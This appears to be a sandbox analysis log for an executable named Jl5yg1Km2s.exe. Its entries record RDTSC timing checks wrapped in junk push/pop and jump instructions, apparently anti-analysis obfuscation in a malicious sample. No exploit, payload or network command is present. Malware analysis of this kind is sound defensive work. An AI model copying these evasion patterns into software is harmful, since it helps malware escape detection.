Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C08222 second address: C0822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C08374 second address: C0837A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0837A second address: C0837E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0837E second address: C08384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C08384 second address: C0838A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0838A second address: C08394 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C084DC second address: C084F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1CC8B8C9E6h 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C084F9 second address: C08507 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1CC8BB7C3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C087CD second address: C087D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C08CB9 second address: C08CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1CC8BB7C3Eh 0x0000000a jne 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C09223 second address: C09240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C09358 second address: C0935C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0935C second address: C09367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C096BB second address: C096C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D86E second address: C0D889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D889 second address: C0D8A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C3Dh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D8A7 second address: C0D8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D8AD second address: C0D8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D8BA second address: C0D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D8C0 second address: C0D8C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0D8C8 second address: C0D8D2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BD712A second address: BD713C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BD713C second address: BD7140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0FF7D second address: C0FF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C0FF81 second address: C0FF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1051D second address: C10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C10521 second address: C10527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C10527 second address: C10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C10537 second address: C1053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1053B second address: C1054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1054B second address: C10553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C10553 second address: C10575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1062F second address: C1065E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9F7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1065E second address: C10675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C10675 second address: C1068C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1068C second address: C10690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: BDA825 second address: BDA832 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1571B second address: C15720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C15720 second address: C15740 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1CC8B8C9F2h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C159BB second address: C159C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C168CB second address: C168D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C16C8F second address: C16C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C16C93 second address: C16C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C175D5 second address: C175FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F1CC8BB7C40h 0x00000012 nop 0x00000013 js 00007F1CC8BB7C44h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C175FD second address: C17601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C17601 second address: C17622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1CC8BB7C48h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C17622 second address: C1762C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1797B second address: C17981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C17BE3 second address: C17C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F1CC8B8C9ECh 0x0000000c jnp 00007F1CC8B8C9E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 jp 00007F1CC8B8C9ECh 0x0000001b pop eax 0x0000001c nop 0x0000001d mov esi, 2EC9228Ah 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C17C11 second address: C17C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007F1CC8BB7C43h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C17C3F second address: C17C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C19165 second address: C19169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C19169 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CC8B8C9ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1A92F second address: C1A933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1CEE5 second address: C1CEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1CEE9 second address: C1CF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 2809FB73h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D25D0h], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D20DEh], edi 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 jmp 00007F1CC8BB7C3Fh 0x0000002b pop esi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1E4EB second address: C1E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1E4EF second address: C1E4F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2359F second address: C235AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1CC8B8C9E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C235AD second address: C235B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C235B1 second address: C235BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C235BD second address: C235C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C235C6 second address: C235CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C245A1 second address: C245A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C245A5 second address: C245AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C245AB second address: C245B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C256FC second address: C25735 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1CC8B8C9F4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1CC8B8C9F9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C25735 second address: C25739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C24728 second address: C24749 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F1CC8B8C9E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CC8B8C9F2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2789B second address: C2789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2789F second address: C278E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+122D2BD7h] 0x00000015 push 00000000h 0x00000017 jng 00007F1CC8B8C9ECh 0x0000001d adc ebx, 1A3DFF34h 0x00000023 mov edi, dword ptr [ebp+122D2C9Dh] 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jng 00007F1CC8B8C9E6h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C269CB second address: C26A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F1CC8BB7C48h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F1CC8BB7C38h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F1CC8BB7C42h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F1CC8BB7C38h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 clc 0x00000056 sub edi, dword ptr [ebp+1244D89Eh] 0x0000005c mov eax, dword ptr [ebp+122D12F9h] 0x00000062 mov dword ptr [ebp+124723E8h], ebx 0x00000068 push FFFFFFFFh 0x0000006a mov ebx, ecx 0x0000006c nop 0x0000006d jmp 00007F1CC8BB7C40h 0x00000072 push eax 0x00000073 pushad 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C278E6 second address: C278F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C278F5 second address: C2790C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2790C second address: C27910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C27910 second address: C27914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2996F second address: C29973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29973 second address: C29985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29985 second address: C29989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29989 second address: C2998F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2A90B second address: C2A90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2A90F second address: C2A919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29C0D second address: C29C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2A919 second address: C2A98E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D2F4Ch], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F1CC8BB7C38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov bx, 8922h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1CC8BB7C47h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29C11 second address: C29C34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2A98E second address: C2A994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C29C34 second address: C29C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2A994 second address: C2A9A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
